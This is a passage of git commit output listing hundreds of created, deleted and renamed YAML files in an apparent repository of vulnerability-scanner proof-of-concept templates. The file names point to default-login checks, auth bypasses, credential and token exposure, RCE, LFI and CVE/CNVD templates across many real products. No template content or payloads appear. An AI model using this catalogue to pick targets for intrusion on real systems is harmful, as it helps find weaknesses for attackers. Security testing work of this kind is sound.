poc/atlassian/bitbucket-takeover-740.yaml delete mode 100644 poc/atlassian/confluence-detect-1187.yaml create mode 100644 poc/atlassian/confluence-detect-1189.yaml create mode 100644 poc/atlassian/confluence-ssrf-sharelinks-1192.yaml delete mode 100644 poc/atlassian/confluence-ssrf-sharelinks-1193.yaml create mode 100644 poc/atlassian/jira-detect-8313.yaml delete mode 100644 poc/atlassian/jira-detect-8314.yaml create mode 100644 poc/atlassian/jira-unauthenticated-installed-gadgets-8330.yaml delete mode 100644 poc/atlassian/jira-unauthenticated-popular-filters-8331.yaml rename poc/atlassian/{jira-unauthenticated-projectcategories-8332.yaml => jira-unauthenticated-projectcategories.yaml} (100%) create mode 100644 poc/atlassian/jira_user_piker (copy 1).yaml delete mode 100644 poc/auth/Dynatrace-token (copy 1).yaml create mode 100644 poc/auth/Mantis-Default_login.yaml delete mode 100644 poc/auth/Redmine-Default-Login.yaml rename poc/auth/{acemanager-login-23.yaml 
=> acemanager-login-24.yaml} (100%) delete mode 100644 poc/auth/activemq-default-login-44.yaml create mode 100644 poc/auth/activemq-default-login-48.yaml create mode 100644 poc/auth/adobe-component-login-89.yaml delete mode 100644 poc/auth/adobe-component-login-90.yaml create mode 100644 poc/auth/adobe-component-login-91.yaml rename poc/auth/{adobe-connect-central-login-93.yaml => adobe-connect-central-login-96.yaml} (100%) delete mode 100644 poc/auth/adobe-experience-manager-login-105.yaml create mode 100644 poc/auth/adobe-experience-manager-login-106.yaml delete mode 100644 poc/auth/aem-default-login-140.yaml rename poc/auth/{aem-login-status-169.yaml => aem-login-status-167.yaml} (100%) create mode 100644 poc/auth/aem-secrets.yaml rename poc/auth/{aims-password-mgmt-client-218.yaml => aims-password-mgmt-client-219.yaml} (100%) create mode 100644 poc/auth/aims-password-mgmt-client-221.yaml create mode 100644 poc/auth/aims-password-portal-225.yaml create mode 100644 poc/auth/alibaba-mongoshake-unauth-268.yaml delete mode 100644 poc/auth/alphaweb-default-login.yaml delete mode 100644 poc/auth/ambari-default-login-287.yaml create mode 100644 poc/auth/ambari-default-login-289.yaml delete mode 100644 poc/auth/ametys-admin-login-301.yaml create mode 100644 poc/auth/ametys-admin-login-302.yaml delete mode 100644 poc/auth/apache-flink-unauth-rce-355.yaml delete mode 100644 poc/auth/apc-ups-login.yaml delete mode 100644 poc/auth/api-mojoauth-466.yaml create mode 100644 poc/auth/api-mojoauth.yaml rename poc/auth/{apollo-default-login-521.yaml => apollo-default-login.yaml} (100%) delete mode 100644 poc/auth/argocd-login-534.yaml rename poc/auth/{argocd-login.yaml => argocd-login-536.yaml} (100%) delete mode 100644 poc/auth/arl-default-login-537.yaml delete mode 100644 poc/auth/atvise-login.yaml create mode 100644 poc/auth/authelia-panel.yaml delete mode 100644 poc/auth/avatier-password-management-605.yaml rename poc/auth/{avatier-password-management.yaml => 
avatier_password_management.yaml} (100%) create mode 100644 poc/auth/aws-access-key-value-624.yaml create mode 100644 poc/auth/aws-opensearch-login-649.yaml delete mode 100644 poc/auth/aws-opensearch-login-650.yaml rename poc/auth/{axiom-digitalocean-key-exposure-667.yaml => axiom-digitalocean-key-exposure.yaml} (100%) rename poc/auth/{azkaban-default-login-673.yaml => azkaban-default-login.yaml} (100%) rename poc/auth/{basic-auth-detection-687.yaml => basic-auth-detection-689.yaml} (100%) create mode 100644 poc/auth/bazarr-login-702.yaml rename poc/auth/{bigbluebutton-login-726.yaml => bigbluebutton-login-724.yaml} (100%) delete mode 100644 poc/auth/blue-iris-login-751.yaml create mode 100644 poc/auth/blue-iris-login-754.yaml delete mode 100644 poc/auth/braintree-access-token.yaml rename poc/auth/{brother-unauthorized-access-792.yaml => brother-unauthorized-access-793.yaml} (100%) create mode 100644 poc/auth/canal-default-login-846.yaml delete mode 100644 poc/auth/canal-default-login-849.yaml delete mode 100644 poc/auth/chinaunicom-default-login-906.yaml delete mode 100644 poc/auth/cisco-finesse-login-938.yaml create mode 100644 poc/auth/cisco-finesse-login-940.yaml create mode 100644 poc/auth/cisco-systems-login-973.yaml delete mode 100644 poc/auth/cisco-systems-login-975.yaml rename poc/auth/{cisco-ucs-kvm-login-980.yaml => cisco-ucs-kvm-login-979.yaml} (100%) create mode 100644 poc/auth/clickhouse-unauth-1002.yaml delete mode 100644 poc/auth/clickhouse-unauth-1003.yaml rename poc/auth/{cobbler-default-login-1119.yaml => cobbler-default-login-1118.yaml} (100%) delete mode 100644 poc/auth/cobbler-default-login.yaml delete mode 100644 poc/auth/codian-mcu-login-1139.yaml create mode 100644 poc/auth/commax-credentials-disclosure-1160.yaml create mode 100644 poc/auth/credentials-1257.yaml delete mode 100644 poc/auth/credentials-1258.yaml create mode 100644 poc/auth/credentials-disclosure-1256.yaml create mode 100644 poc/auth/crush-ftp-login-1275.yaml create mode 
100644 poc/auth/crushftp-default-login.yaml create mode 100644 poc/auth/cs-cart-unauthenticated-lfi-1284.yaml rename poc/auth/{cs-cart-unauthenticated-lfi-1285.yaml => cs-cart-unauthenticated-lfi.yaml} (100%) delete mode 100644 poc/auth/dbeaver-credentials-6780.yaml rename poc/auth/{dell-idrac-default-login-6943.yaml => dell-idrac-default-login.yaml} (100%) delete mode 100644 poc/auth/dell-openmanager-login-6949.yaml delete mode 100644 poc/auth/dell-openmanager-login-6951.yaml create mode 100644 poc/auth/directadmin-login-panel-7000.yaml delete mode 100644 poc/auth/django-secret-key.yaml create mode 100644 poc/auth/django-secret.key.yaml create mode 100644 poc/auth/dolphinscheduler-default-login-7073.yaml rename poc/auth/{dubbo-admin-default-login.yaml => dubbo-admin-default-login-7120.yaml} (100%) rename poc/auth/{dvwa-default-login-7127.yaml => dvwa-default-login.yaml} (100%) delete mode 100644 poc/auth/dvwa-headless-automatic-login-7130.yaml create mode 100644 poc/auth/dvwa-headless-automatic-login-7131.yaml create mode 100644 poc/auth/dynatrace-token-7145.yaml delete mode 100644 poc/auth/dynatrace-token-7146.yaml delete mode 100644 poc/auth/emcecom-default-login-7211.yaml create mode 100644 poc/auth/emqx-default-login-7222.yaml delete mode 100644 poc/auth/ems-login-panel-7223.yaml delete mode 100644 poc/auth/epmp-login.yaml delete mode 100644 poc/auth/etcd-keys-7261.yaml delete mode 100644 poc/auth/etcd-keys-7262.yaml rename poc/auth/{exacqvision-default-login-7277.yaml => exacqvision-default-login.yaml} (100%) delete mode 100644 poc/auth/faraday-login-7395.yaml delete mode 100644 poc/auth/faraday-login-7397.yaml create mode 100644 poc/auth/fatpipe-auth-bypass-7431.yaml delete mode 100644 poc/auth/fatpipe-auth-bypass.yaml delete mode 100644 poc/auth/flir-default-login-7514.yaml create mode 100644 poc/auth/flir-default-login.yaml delete mode 100644 poc/auth/frp-default-login-7556.yaml delete mode 100644 poc/auth/ftp-credentials-exposure-7568.yaml create mode 
100644 poc/auth/ftp-credentials-exposure.yaml delete mode 100644 poc/auth/ftp-weak-credentials-7570.yaml create mode 100644 poc/auth/git-credentials-disclosure-7641.yaml rename poc/auth/{git-credentials-disclosure-7640.yaml => git-credentials-disclosure.yaml} (100%) delete mode 100644 poc/auth/gitlab-public-signup-7683.yaml delete mode 100644 poc/auth/gitlab-weak-login.yaml delete mode 100644 poc/auth/glpi-authentication-7730.yaml create mode 100644 poc/auth/glpi-default-login.yaml delete mode 100644 poc/auth/gmail-api-client-secrets-7741.yaml create mode 100644 poc/auth/google-earth-dlogin-7781.yaml rename poc/auth/{facebook-secrets.yaml => google-secrets.yaml} (100%) delete mode 100644 poc/auth/gophish-login-7795.yaml create mode 100644 poc/auth/gophish-login-7796.yaml create mode 100644 poc/auth/grafana-public-signup-7814.yaml create mode 100644 poc/auth/guacamole-default-login-7859.yaml create mode 100644 poc/auth/hongdian-default-login-7997.yaml delete mode 100644 poc/auth/hongdian-default-login-7999.yaml delete mode 100644 poc/auth/hp-ilo-serial-key-disclosure-8023.yaml create mode 100644 poc/auth/hp-ilo-serial-key-disclosure-8025.yaml create mode 100644 poc/auth/hpe-system-management-login-8017.yaml create mode 100644 poc/auth/htpasswd-detection-8046.yaml delete mode 100644 poc/auth/http-etcd-unauthenticated-api-data-leak-8056.yaml create mode 100644 poc/auth/http-etcd-unauthenticated-api-data-leak.yaml delete mode 100644 poc/auth/huawei-HG532e-default-router-login.yaml create mode 100644 poc/auth/huawei-router-auth-bypass-8076.yaml delete mode 100644 poc/auth/hue-default-credential-8081.yaml delete mode 100644 poc/auth/hue-default-credential.yaml rename poc/auth/{ibm-note-login-8110.yaml => ibm-note-login-8112.yaml} (100%) create mode 100644 poc/auth/icinga-web-login-8134.yaml delete mode 100644 poc/auth/icinga-web-login-8137.yaml delete mode 100644 poc/auth/idemia-biometrics-default-login-8139.yaml rename poc/auth/{idemia-biometrics-default-login.yaml => 
idemia-biometrics-default-login-8141.yaml} (100%) delete mode 100644 poc/auth/iptime-default-login-8193.yaml delete mode 100644 poc/auth/jellyseerr-login-panel.yaml delete mode 100644 poc/auth/jenkins-login-8277.yaml create mode 100644 poc/auth/jenkins-login-8280.yaml create mode 100644 poc/auth/jfrog-unauth-build-exposed-8299.yaml create mode 100644 poc/auth/jinher-oa-default-login-8312.yaml create mode 100644 poc/auth/jira-unauthenticated-installed-gadgets-8330.yaml delete mode 100644 poc/auth/jira-unauthenticated-popular-filters-8331.yaml rename poc/auth/{jira-unauthenticated-projectcategories-8332.yaml => jira-unauthenticated-projectcategories.yaml} (100%) delete mode 100644 poc/auth/jmx-default-login-8355.yaml create mode 100644 poc/auth/jmx-default-login.yaml create mode 100644 poc/auth/jolokia-unauthenticated-lfi-8366.yaml rename poc/auth/{jolokia-unauthenticated-lfi-8364.yaml => jolokia-unauthenticated-lfi.yaml} (100%) delete mode 100644 poc/auth/jupyter-ipython-unauth-8402.yaml delete mode 100644 poc/auth/jupyterhub-default-login-8400.yaml rename poc/auth/{jwt-token-8410.yaml => jwt-token.yaml} (100%) create mode 100644 poc/auth/kafka-center-default-login.yaml create mode 100644 poc/auth/kasm-login-panel.yaml create mode 100644 poc/auth/keenetic-web-login-8442.yaml delete mode 100644 poc/auth/keenetic-web-login-8443.yaml delete mode 100644 poc/auth/kentico-login-8446.yaml rename poc/auth/{keycloak-json-8472.yaml => keycloak-json-8473.yaml} (100%) delete mode 100644 poc/auth/keycloak-openid-config-8475.yaml create mode 100644 poc/auth/keycloak-openid-config.yaml rename poc/auth/{kubernetes-unauth.yaml => kubernetes-unauth(1).yaml} (100%) delete mode 100644 poc/auth/lucee-login-8665.yaml create mode 100644 poc/auth/lutron-iot-default-login-8675.yaml delete mode 100644 poc/auth/lutron-iot-default-login-8678.yaml delete mode 100644 poc/auth/mailchimp-api-key-8726.yaml delete mode 100644 poc/auth/meshcentral-login-8801.yaml create mode 100644 
poc/auth/meshcentral-login-8803.yaml delete mode 100644 poc/auth/mongodb-unauth-8925.yaml create mode 100644 poc/auth/nagios-default-login-8990.yaml delete mode 100644 poc/auth/nagios-default-login-8994.yaml delete mode 100644 poc/auth/netgear-router-auth-bypass-9025.yaml create mode 100644 poc/auth/netgear-router-auth-bypass.yaml delete mode 100644 poc/auth/netsus-default-login-9060.yaml create mode 100644 poc/auth/netsus-default-login.yaml create mode 100644 poc/auth/netsus-server-login-9061.yaml delete mode 100644 poc/auth/netsus-server-login-9062.yaml delete mode 100644 poc/auth/nps-default-login-9145.yaml create mode 100644 poc/auth/nuuno-network-login-9164.yaml rename poc/auth/{nuuno-network-login-9162.yaml => nuuno-network-login.yaml} (100%) create mode 100644 poc/auth/oauth-access-key-9186.yaml delete mode 100644 poc/auth/oauth2-detect-9181.yaml delete mode 100644 poc/auth/octobercms-default-login-9192.yaml create mode 100644 poc/auth/octobercms-default-login.yaml delete mode 100644 poc/auth/ofbiz-default-login-9210.yaml create mode 100644 poc/auth/open-stack-dashboard-login-9321.yaml delete mode 100644 poc/auth/open-stack-dashboard-login-9322.yaml delete mode 100644 poc/auth/openemr-default-login.yaml create mode 100644 poc/auth/oracle-opera-login.yaml create mode 100644 poc/auth/panabit-ixcache-default-login.yaml create mode 100644 poc/auth/panos-default-login-9455.yaml create mode 100644 poc/auth/panos-default-login.yaml create mode 100644 poc/auth/paypal-braintree-token(1).yaml delete mode 100644 poc/auth/paypal-braintree-token-11856.yaml delete mode 100644 poc/auth/pentaho-default-login-9478.yaml create mode 100644 poc/auth/pentaho-default-login-9480.yaml delete mode 100644 poc/auth/pinpoint-unauth-9590.yaml delete mode 100644 poc/auth/polycom-login-9625.yaml create mode 100644 poc/auth/polycom-login-9627.yaml delete mode 100644 poc/auth/possible-AEM-secrets.yaml rename poc/auth/{putty-private-key-disclosure-9732.yaml => 
putty-private-key-disclosure-9730.yaml} (100%) delete mode 100644 poc/auth/rails-secret-token-disclosure-9809.yaml create mode 100644 poc/auth/rails-secret-token-disclosure-9810.yaml create mode 100644 poc/auth/rainloop-default-login.yaml create mode 100644 poc/auth/ranger-default-login-9827.yaml create mode 100644 poc/auth/rockmongo-default-login-9897.yaml rename poc/auth/{routeros-login-9908.yaml => routeros-login-9909.yaml} (100%) delete mode 100644 poc/auth/routeros-login.yaml delete mode 100644 poc/auth/ruijie-eg-password-leak-9922.yaml delete mode 100644 poc/auth/saferoads-vms-login-9971.yaml create mode 100644 poc/auth/saferoads-vms-login-9973.yaml create mode 100644 poc/auth/samsung-wlan-default-login-10018.yaml delete mode 100644 poc/auth/sangfor-edr-auth-bypass.yaml rename poc/auth/{sauter-login-10089.yaml => sauter-login-10091.yaml} (100%) delete mode 100644 poc/auth/seats-login-10104.yaml create mode 100644 poc/auth/server-backup-login-10153.yaml delete mode 100644 poc/auth/server-backup-login-10156.yaml rename poc/auth/{service-pwd.yaml => service-pwd-10176.yaml} (100%) delete mode 100644 poc/auth/servicedesk-login-panel-10172.yaml create mode 100644 poc/auth/shopify-custom-token(1).yaml delete mode 100644 poc/auth/shopify-custom-token-10198.yaml delete mode 100644 poc/auth/shopify-private-token-11861.yaml create mode 100644 poc/auth/shoppable-token-10209.yaml create mode 100644 poc/auth/shoppable-token.yaml rename poc/auth/{sitefinity-login-10298.yaml => sitefinity-login-10297.yaml} (100%) delete mode 100644 poc/auth/siteomat-login-10300.yaml create mode 100644 poc/auth/siteomat-login-10301.yaml create mode 100644 poc/auth/slack-bot-token-10312.yaml delete mode 100644 poc/auth/solar-log-authbypass-10352.yaml create mode 100644 poc/auth/solar-log-authbypass.yaml delete mode 100644 poc/auth/solarwinds-default-login-10355.yaml create mode 100644 poc/auth/somfy-login-10371.yaml delete mode 100644 poc/auth/somfy-login-10373.yaml delete mode 100644 
poc/auth/sonarqube-token-10380.yaml create mode 100644 poc/auth/spark-webui-unauth-10401.yaml delete mode 100644 poc/auth/sphider-login-10407.yaml create mode 100644 poc/auth/sphider-login-10409.yaml delete mode 100644 poc/auth/splunk-enterprise-login-panel.yml create mode 100644 poc/auth/splunk-login-10416.yaml delete mode 100644 poc/auth/square-access-token(1).yaml create mode 100644 poc/auth/square-access-token-11867.yaml create mode 100644 poc/auth/stem-audio-table-private-keys-10535.yaml delete mode 100644 poc/auth/stem-audio-table-private-keys-10536.yaml create mode 100644 poc/auth/stripe-api-key(1).yaml delete mode 100644 poc/auth/stripe-api-key-11869.yaml create mode 100644 poc/auth/stripe-restricted-key.yaml delete mode 100644 poc/auth/submitty-login-10568.yaml create mode 100644 poc/auth/supermicro-default-login.yaml delete mode 100644 poc/auth/symantec-dlp-login-10596.yaml rename poc/auth/{symantec-epm-login-10601.yaml => symantec-epm-login-10599.yaml} (100%) rename poc/auth/{szhe-default-login.yaml => szhe-default-login-10638.yaml} (100%) create mode 100644 poc/auth/telecom-gateway-default-login.yaml create mode 100644 poc/auth/tidb-unauth-10770.yaml delete mode 100644 poc/auth/tidb-unauth-10772.yaml create mode 100644 poc/auth/tomcat-default-login.yaml create mode 100644 poc/auth/ucmdb-default-login-10871.yaml rename poc/auth/{ucmdb-default-login-10869.yaml => ucmdb-default-login.yaml} (100%) delete mode 100644 poc/auth/unauth-ftp-10942.yaml delete mode 100644 poc/auth/unauth-hoteldruid-panel-10943.yaml create mode 100644 poc/auth/unauth-hoteldruid-panel.yaml delete mode 100644 poc/auth/unauth-spark-api.yaml create mode 100644 poc/auth/unauth-wavink-panel-10967.yaml delete mode 100644 poc/auth/unauth-xproxy-dashboard-10968.yaml create mode 100644 poc/auth/unauth-xproxy-dashboard-10969.yaml create mode 100644 poc/auth/unauthenticated-airflow-10884.yaml delete mode 100644 poc/auth/unauthenticated-airflow-10886.yaml delete mode 100644 
poc/auth/unauthenticated-alert-manager-10892.yaml create mode 100644 poc/auth/unauthenticated-frp-10895.yaml delete mode 100644 poc/auth/unauthenticated-frp-10897.yaml create mode 100644 poc/auth/unauthenticated-influxdb-10903.yaml create mode 100644 poc/auth/unauthenticated-mongo-express.yaml create mode 100644 poc/auth/unauthenticated-nacos-access-10912.yaml delete mode 100644 poc/auth/unauthenticated-nacos-access-10915.yaml create mode 100644 poc/auth/unauthenticated-popup-upload-10921.yaml rename poc/auth/{unauthenticated-popup-upload-10922.yaml => unauthenticated-popup-upload.yaml} (100%) delete mode 100644 poc/auth/unauthenticated-prtg-10924.yaml create mode 100644 poc/auth/unauthenticated-prtg-10927.yaml delete mode 100644 poc/auth/unauthenticated-zipkin.yaml delete mode 100644 poc/auth/unauthorized-h3csecparh-login-10948.yaml create mode 100644 poc/auth/unauthorized-h3csecparh-login.yaml create mode 100644 poc/auth/unauthorized-hp-printer-10951.yaml delete mode 100644 poc/auth/unauthorized-plastic-scm-10957.yaml create mode 100644 poc/auth/unauthorized-puppet-node-manager-detect-10958.yaml delete mode 100644 poc/auth/unauthorized-puppet-node-manager-detect-10959.yaml delete mode 100644 poc/auth/vidyo-default-login-11009.yaml rename poc/auth/{vidyo-default-login.yaml => vidyo-default-login-11010.yaml} (100%) create mode 100644 poc/auth/vigor-login-11020.yaml delete mode 100644 poc/auth/vigor-login-11023.yaml create mode 100644 poc/auth/visionhub-default-login-11026.yaml create mode 100644 poc/auth/vpms-auth-bypass-11066.yaml delete mode 100644 poc/auth/vpms-auth-bypass-11068.yaml rename poc/auth/{watchguard-credentials-disclosure-11106.yaml => watchguard-credentials-disclosure.yaml} (100%) delete mode 100644 poc/auth/weblogic-weak-login-11154.yaml delete mode 100644 poc/auth/wifisky-default-password-11205.yaml delete mode 100644 poc/auth/wordpress-infinitewp-auth-bypass-11288.yaml create mode 100644 poc/auth/wordpress-weak-credentials-11336.yaml delete mode 
100644 poc/auth/wordpress-weak-credentials-11337.yaml create mode 100644 poc/auth/wpdm-cache-session-11436.yaml delete mode 100644 poc/auth/wpdm-cache-session-11438.yaml delete mode 100644 poc/auth/wso2-default-login.yaml delete mode 100644 poc/auth/xenforo-login-11674.yaml create mode 100644 poc/auth/xenmobile-login-11675.yaml delete mode 100644 poc/auth/xenmobile-login-11677.yaml create mode 100644 poc/auth/xerox7-default-login.yaml create mode 100644 poc/auth/xvr-login-11705.yaml delete mode 100644 poc/auth/xxljob-default-login-11709.yaml create mode 100644 poc/auth/zabbix-server-login-11769.yaml create mode 100644 poc/auth/zeroshell-login-11788.yaml delete mode 100644 poc/auth/zeroshell-login-11790.yaml create mode 100644 poc/auth/zhiyuan-oa-session-leak-11802.yaml rename poc/auth/{zhiyuan-oa-session-leak-11801.yaml => zhiyuan-oa-session-leak.yaml} (100%) create mode 100644 poc/auth/zhiyuan-oa-unauthorized-11806.yaml delete mode 100644 poc/auth/zhiyuan-oa-unauthorized-11808.yaml create mode 100644 poc/auth/zimbra-preauth-ssrf.yaml create mode 100644 poc/auth/zms-auth-bypass-11830.yaml delete mode 100644 poc/auth/zms-auth-bypass-11832.yaml delete mode 100644 poc/aws/amazon-docker-config-280.yaml delete mode 100644 poc/aws/amazon-docker-config-disclosure-278.yaml create mode 100644 poc/aws/amazon-docker-config.yaml delete mode 100644 poc/aws/aws-access-id-618.yaml delete mode 100644 poc/aws/aws-access-id-620.yaml create mode 100644 poc/aws/aws-access-key-value-624.yaml delete mode 100644 poc/aws/aws-bucket-service-628.yaml create mode 100644 poc/aws/aws-bucket-service.yaml delete mode 100644 poc/aws/aws-cloudfront-service-635.yaml delete mode 100644 poc/aws/aws-cognito-638.yaml delete mode 100644 poc/aws/aws-ecs-container-agent-tasks-641.yaml delete mode 100644 poc/aws/aws-elastic-beanstalk-detect.yaml create mode 100644 poc/aws/aws-opensearch-login-649.yaml delete mode 100644 poc/aws/aws-opensearch-login-650.yaml create mode 100644 poc/aws/aws-redirect-651.yaml 
create mode 100644 poc/aws/awstats-config-656.yaml delete mode 100644 poc/aws/awstats-config.yaml create mode 100644 poc/aws/awstats-script-657.yaml delete mode 100644 poc/aws/awstats-script-658.yaml delete mode 100644 poc/aws/ec2-detection-7162.yaml create mode 100644 poc/aws/ec2-detection-7163.yaml delete mode 100644 poc/aws/metadata-aws.yaml delete mode 100644 poc/aws/s3-subtakeover-9968.yaml create mode 100644 poc/aws/s3-subtakeover-9969.yaml delete mode 100644 poc/backup/db-backup-lfi-6774.yaml create mode 100644 poc/backup/db-backup-lfi-6775.yaml rename poc/backup/{php-backup-files-9497.yaml => php-backup-files-9498.yaml} (100%) create mode 100644 poc/backup/server-backup-login-10153.yaml delete mode 100644 poc/backup/server-backup-login-10156.yaml delete mode 100644 poc/backup/server-backup-manager-se-10157.yaml create mode 100644 poc/backup/server-backup-manager-se-10160.yaml rename poc/backup/{wordpress-total-upkeep-backup-download-11322.yaml => wordpress-total-upkeep-backup-download-11324.yaml} (100%) delete mode 100644 poc/cisco/cisco-cloudcenter-suite-log4j-rce.yaml create mode 100644 poc/cisco/cisco-cloudcenter-suite-rce.yaml delete mode 100644 poc/cisco/cisco-finesse-login-938.yaml create mode 100644 poc/cisco/cisco-finesse-login-940.yaml create mode 100644 poc/cisco/cisco-meraki-exposure-944.yaml delete mode 100644 poc/cisco/cisco-meraki-exposure-946.yaml delete mode 100644 poc/cisco/cisco-network-config-949.yaml create mode 100644 poc/cisco/cisco-network-config.yaml delete mode 100644 poc/cisco/cisco-prime-infrastructure-952.yaml create mode 100644 poc/cisco/cisco-prime-infrastructure-954.yaml create mode 100644 poc/cisco/cisco-sd-wan-955.yaml delete mode 100644 poc/cisco/cisco-sd-wan-957.yaml delete mode 100644 poc/cisco/cisco-secure-desktop-962.yaml delete mode 100644 poc/cisco/cisco-security-details-963.yaml rename poc/cisco/{cisco-smi-exposure-972.yaml => cisco-smi-exposure-971.yaml} (100%) create mode 100644 
poc/cisco/cisco-systems-login-973.yaml delete mode 100644 poc/cisco/cisco-systems-login-975.yaml create mode 100644 poc/cisco/cisco-telepresence-976.yaml delete mode 100644 poc/cisco/cisco-telepresence-978.yaml rename poc/cisco/{cisco-ucs-kvm-login-980.yaml => cisco-ucs-kvm-login-979.yaml} (100%) delete mode 100644 poc/coldfusion/adobe-coldfusion-detect-82.yaml create mode 100644 poc/coldfusion/adobe-coldfusion-error-detect-86.yaml rename poc/coldfusion/{adobe-coldfusion-error-detect-88.yaml => adobe-coldfusion-error-detect.yaml} (100%) create mode 100644 poc/coldfusion/coldfusion-debug-xss-1153.yaml delete mode 100644 poc/coldfusion/coldfusion-debug-xss.yaml create mode 100644 poc/coldfusion/unpatched-coldfusion-10979.yaml rename poc/config/{aerohive-netconfig-ui.yaml => aerohive-netconfig-ui-200.yaml} (100%) create mode 100644 poc/config/airflow-configuration-exposure-230.yaml delete mode 100644 poc/config/airflow-configuration-exposure.yaml delete mode 100644 poc/config/amazon-docker-config-280.yaml delete mode 100644 poc/config/amazon-docker-config-disclosure-278.yaml create mode 100644 poc/config/amazon-docker-config.yaml create mode 100644 poc/config/ansible-config-disclosure-326.yaml delete mode 100644 poc/config/ansible-config-disclosure.yaml create mode 100644 poc/config/api-iconfinder-439.yaml create mode 100644 poc/config/awstats-config-656.yaml delete mode 100644 poc/config/awstats-config.yaml create mode 100644 poc/config/bigip-config-utility-detect-730.yaml create mode 100644 poc/config/bigip-config-utility-detect-732.yaml delete mode 100644 poc/config/buffalo-config-injection-798.yaml create mode 100644 poc/config/buffalo-config-injection-800.yaml create mode 100644 poc/config/buffalo-config-injection-801.yaml create mode 100644 poc/config/circleci-config-923.yaml delete mode 100644 poc/config/cisco-network-config-949.yaml create mode 100644 poc/config/cisco-network-config.yaml create mode 100644 poc/config/config-rb-1179.yaml rename 
poc/config/{config-rb-1180.yaml => config-rb.yaml} (100%) delete mode 100644 poc/config/confluence-detect-1187.yaml create mode 100644 poc/config/confluence-detect-1189.yaml create mode 100644 poc/config/confluence-ssrf-sharelinks-1192.yaml delete mode 100644 poc/config/confluence-ssrf-sharelinks-1193.yaml create mode 100644 poc/config/cors-misconfig-1223.yaml delete mode 100644 poc/config/docker-compose-config-7059.yaml create mode 100644 poc/config/docker-compose-config.yaml delete mode 100644 poc/config/dockercfg-config.yaml delete mode 100644 poc/config/firebase-config-exposure.yaml create mode 100644 poc/config/front-page-misconfig-7547.yaml rename poc/config/{ftpconfig.yaml => ftpconfig-7565.yaml} (100%) create mode 100644 poc/config/git-config-7635.yaml rename poc/config/{git-config-nginxoffbyslash-7632.yaml => git-config-nginxoffbyslash-7628.yaml} (100%) create mode 100644 poc/config/git-config-nginxoffbyslash-7630.yaml create mode 100644 poc/config/github-page-config-7654.yaml delete mode 100644 poc/config/gocd-cruise-configuration-7748.yaml rename poc/config/{honeywell-scada-config.yaml => honeywell-scada-config-7990.yaml} (100%) delete mode 100644 poc/config/honeywell-scada-config-7992.yaml create mode 100644 poc/config/htaccess-config-8043.yaml create mode 100644 poc/config/httpd-config-8055.yaml delete mode 100644 poc/config/httpd-config.yaml delete mode 100644 poc/config/keycloak-openid-config-8475.yaml create mode 100644 poc/config/keycloak-openid-config.yaml delete mode 100644 poc/config/magento-config-disclosure.yaml rename poc/config/{misconfigured-docker-8902.yaml => misconfigured-docker-8900.yaml} (100%) create mode 100644 poc/config/msmtp-config-8967.yaml rename poc/config/{nginx-config.yaml => nginx-config-9099.yaml} (100%) delete mode 100644 poc/config/parameters-config-9465.yaml create mode 100644 poc/config/parameters-config.yaml create mode 100644 poc/config/prometheus-config-9673.yaml delete mode 100644 poc/config/prometheus-config.yaml 
delete mode 100644 poc/config/samba-config-9987.yaml create mode 100644 poc/config/samba-config.yaml delete mode 100644 poc/config/springboot-autoconfig.yaml create mode 100644 poc/config/springboot-configprops-10442.yaml delete mode 100644 poc/config/symfony-database-config-10616.yaml rename poc/config/{symfony-database-config.yaml => symfony-database-config-10617.yaml} (100%) create mode 100644 poc/config/tcpconfig.yaml delete mode 100644 poc/config/tugboat-config-exposure-10842.yaml rename poc/config/{tugboat-config-exposure.yaml => tugboat-config-exposure-10843.yaml} (100%) delete mode 100644 poc/config/wamp-server-configuration-11096.yaml delete mode 100644 poc/config/web-config-11125.yaml delete mode 100644 poc/config/wordpress-accessible-wpconfig-11235.yaml delete mode 100644 poc/config/wordpress-git-config-11278.yaml delete mode 100644 poc/config/wpengine-config-check.yaml create mode 100644 poc/config/zend-config-file-11778.yaml delete mode 100644 poc/config/zend-config-file-11779.yaml create mode 100644 poc/crlf_injection/crlf-injection-1262.yaml rename poc/cross_site_request_forgery/{csrfguard-detect-1290.yaml => csrfguard-detect.yaml} (100%) create mode 100644 poc/cve/CNVD-2021-26422.yaml create mode 100644 poc/cve/CVE-2019-9082 (copy 2).yaml delete mode 100644 poc/cve/CVE-2020-10124 (copy 1).yaml create mode 100644 poc/cve/CVE-2022-0921.yaml create mode 100644 poc/cve/CVE-2023-34039.yaml create mode 100644 poc/cve/CVE-2024-1183.yaml create mode 100644 poc/cve/CVE-2024-32651.yaml create mode 100644 poc/cve/CVE-2024-35668.yaml create mode 100644 poc/cve/CVE-2024-3668.yaml create mode 100644 poc/cve/CVE-2024-4468.yaml create mode 100644 poc/cve/CVE-2024-4661.yaml create mode 100644 poc/cve/CVE-2024-5087.yaml create mode 100644 poc/cve/CVE-2024-5091.yaml create mode 100644 poc/cve/CVE-2024-5613.yaml create mode 100644 poc/cve/CVE-2024-5638.yaml create mode 100644 poc/cve/CVE-2024-5654.yaml create mode 100644 poc/cve/CVE-2024-5663.yaml create mode 100644 
poc/cve/CVE-2024-5758.yaml create mode 100644 poc/cve/CVE-2024-5770-535af98dd21b180aed9353b26ab61bf4.yaml delete mode 100644 poc/cve/cnvd-2019-01348-1042.yaml create mode 100644 poc/cve/cnvd-2019-01348-1044.yaml create mode 100644 poc/cve/cnvd-2019-06255-1046.yaml delete mode 100644 poc/cve/cnvd-2019-06255-1050.yaml create mode 100644 poc/cve/cnvd-2019-32204-1053.yaml delete mode 100644 poc/cve/cnvd-2019-32204-1054.yaml rename poc/cve/{cnvd-2020-56167-1064.yaml => cnvd-2020-56167-1061.yaml} (100%) rename poc/cve/{cnvd-2020-62422-1068.yaml => cnvd-2020-62422-1069.yaml} (100%) delete mode 100644 poc/cve/cnvd-2020-68596-1073.yaml create mode 100644 poc/cve/cnvd-2020-68596-1074.yaml create mode 100644 poc/cve/cnvd-2021-01931-1078.yaml delete mode 100644 poc/cve/cnvd-2021-10543-1082.yaml rename poc/cve/{cnvd-2021-14536-1088.yaml => cnvd-2021-14536-1087.yaml} (100%) delete mode 100644 poc/cve/cnvd-2021-15822-1089.yaml create mode 100644 poc/cve/cnvd-2021-15822-1093.yaml rename poc/cve/{cnvd-2021-15824-1096.yaml => cnvd-2021-15824-1097.yaml} (100%) delete mode 100644 poc/cve/cnvd-2021-26422-1103.yaml create mode 100644 poc/cve/cnvd-2021-28277-1105.yaml delete mode 100644 poc/cve/cnvd-2021-30167-1108.yaml rename poc/cve/{cnvd-2021-49104-1113.yaml => cnvd-2021-49104-1114.yaml} (100%) create mode 100644 poc/cve/cnvd-2022-03672-1116.yaml delete mode 100644 poc/cve/cnvd-2022-03672-1117.yaml create mode 100644 